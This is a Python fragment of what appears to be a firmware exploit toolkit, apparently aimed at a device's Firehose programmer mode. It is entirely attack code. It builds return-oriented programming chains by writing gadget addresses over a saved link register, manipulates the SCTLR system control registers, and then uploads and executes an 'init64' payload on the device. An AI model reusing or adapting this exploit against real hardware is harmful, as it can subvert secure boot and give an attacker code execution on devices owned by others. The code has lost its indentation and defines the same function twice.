def rop():
target = t.get()
# copy original stack
FH_FW.copy(0xFEC040a0, 0xFEC03F90, 0x256)
FH_FW.copy(0xFEC04098, 0xFEC03F88, 8)
# gadget_set_sctlr_el3
FH_FW.poke64(0xFEC04060, 0xF803DF38)
# saved x1 = 0
FH_FW.poke64(0xFEC04f88, 0)
# gadget_blr_x4
FH_FW.poke64(0xFEC03f90, 0xf800e280)
# super gadget F803E848
FH_FW.poke64(target.saved_lr_addr, 0xF803E848)
def rop():
target = t.get()
# super gadget
# FH_FW.poke64(target.saved_lr_addr+8, GADGET_INFINITE_LOOP)
"""
# copy original stack
FH_FW.copy(target.saved_lr_addr+0x128, target.saved_lr_addr+8, 0x128)
# copy original saved lr
FH_FW.poke64(target.saved_lr_addr+0x120, target.saved_lr)
# set new stack
FH_FW.poke64(target.saved_lr_addr+0x20, target.saved_lr_addr+0x118)
# set blr x8 gadget
FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET)
# set saved_x8
FH_FW.poke64(target.saved_lr_addr+0xb8, GADGET_RESET)
# set super gadget
FH_FW.poke64(target.saved_lr_addr, GADGET_SUPER)
"""
# FH_FW.poke64(target.saved_lr_addr+0xC0, 0)
# FH_FW.poke64(target.saved_lr_addr+0x30, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x28, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x20, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x18, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x10, GADGET_RESET)
# FH_FW.poke64(target.saved_lr_addr+0x8, GADGET_RESET)
FH_FW.poke64(target.saved_lr_addr + 0x1f0, 0x0) # x1
FH_FW.poke64(target.saved_lr_addr + 0x108, 0x98) # x28
FH_FW.poke64(target.saved_lr_addr + 0x128, 0x1) # x24
FH_FW.poke64(target.saved_lr_addr + 0x130, 0x1000) # X25
FH_FW.poke64(target.saved_lr_addr + 0x160,
target.saved_lr_addr + 0x218 + 0x28)
FH_FW.poke64(target.saved_lr_addr + 0x200,
target.saved_lr_addr + 0x218 + 0x28)
FH_FW.copy_and_rebase(target.saved_lr_addr + 0x218,
target.saved_lr_addr + 8, 0x210)
FH_FW.poke64(target.saved_lr_addr + 0x210, target.saved_lr)
FH_FW.poke64(target.saved_lr_addr + 0x110, target.saved_lr_addr + 0x208)
FH_FW.poke64(target.saved_lr_addr + 0x1a8, GADGET_SCTLR_EL1)
FH_FW.poke64(target.saved_lr_addr + 0xf8, GADGET_BLR_X8)
FH_FW.poke64(target.saved_lr_addr + 0xf0, GADGET_SUPER)
FH_FW.poke64(target.saved_lr_addr, GADGET_ADD_SP)
def upload_init64():
target = t.get()
FH_FW.poke64(target.fh_base_programmer, 0x12345678)
FH_FW.sendfile("../device/build/init64.payload", target.fh_base_programmer)
FH_FW.exe64(target.fh_base_programmer)